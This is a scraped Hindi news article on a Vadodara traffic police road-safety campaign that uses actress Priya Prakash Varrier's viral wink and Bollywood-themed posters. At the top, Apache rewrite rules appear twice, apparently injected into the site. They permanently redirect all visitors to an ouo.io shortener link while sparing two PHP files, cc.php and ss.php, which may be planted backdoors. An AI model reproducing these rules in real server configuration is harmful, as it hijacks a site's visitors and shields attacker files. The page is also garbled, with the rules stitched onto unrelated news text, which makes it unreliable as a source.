
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 330
Previous Nextवडोदरा। मलयालम एक्ट्रेस प्रिया प्रकाश वारियर के आंख मारने की स्टाइल को वडोदरा पुलिस सेफ ड्राइविंग के प्रति जागरूकता फैलाने के लिए यूज कर रही है। सोशल मीडिया पर लोगों को ट्रैफिक रूल्स के प्रति जागरूक करने के लिए उन्होंने एक दिलचस्प तरीका अपनाया है। प्रिया प्रकाश के फेम को देखते हुए ट्रैफिक पुलिस ने यह क्रिएटिव कैम्पेन शुरू किया है। 26 सेकंड के एक वीडियो से प्रिया प्रकाश रातोंरात इंटरनेट सनसनी बन गई थीं। प्रिया की पहली मलयालम फिल्म 'उरू अदार लव' के गाने 'मानिक्य मलाराया पूवी' में बॉयफ्रेंड को आंख मारते हुए नजर आईं थी। उन्होंने प्रिया प्रकाश का एक पोस्टर पोस्ट किया है जिसमें वे कहती हैं- 'पलक झपकते ही दुर्घटना हो जाती है। बिना ध्यान भटकाए सावधानी से ड्राइव करें। #ट्रैफिक एक संस्कार।' यह टैगलाइन सोशल मीडिया पर वायरल हो रही है। इस मुहिम के तहत वडोदरा पुलिस हल्के-फुल्के मूड में लोगों को जागरूक कर रही है।
लेकिन यह पहली बार नहीं हैं जब वडोदरा पुलिस ने सोशल मीडिया पर ऐसा कैम्पेन चलाया हो। उन्होंने कई ऐसे पोस्टर जारी किए हैं जिसे देखने और पढ़ने में जा आएगा लेकिन साथ ही जरूरी जानकारियां भी मिल सकेंगी। सोशल साइट पर वडोदरा ट्रैफिक पुलिस का यह अभियान अलग-अलग हैशटैग के साथ चलाया जा रहा है।
एक पोस्टर पर सलमान के किरदार इंस्पेक्टर चुलबुल पांडे को बोलते दिखाया गया है कि हम तुम में इतने छेद करेंगे कि कनफ्यूज हो जाओगे...हम कानून अपने हाथ में नहीं लेते, आपको भी नहीं लेना चाहिए।
एक और पोस्टर पर पोस्ट किया गया है जिसमें लिखा है, सेल्फी लेने वालों के हाथ, कानून से भी लंबे होते हैं। सेल्फी लेते वक्त इसका खयाल रखें कि इससे आप खुद और किसी और को खतरे में न डाल दें। युवाओं को टारगेट करते हुए वडोदरा पुलिस ने जागरूकता का ये अंदाज अपनाया है।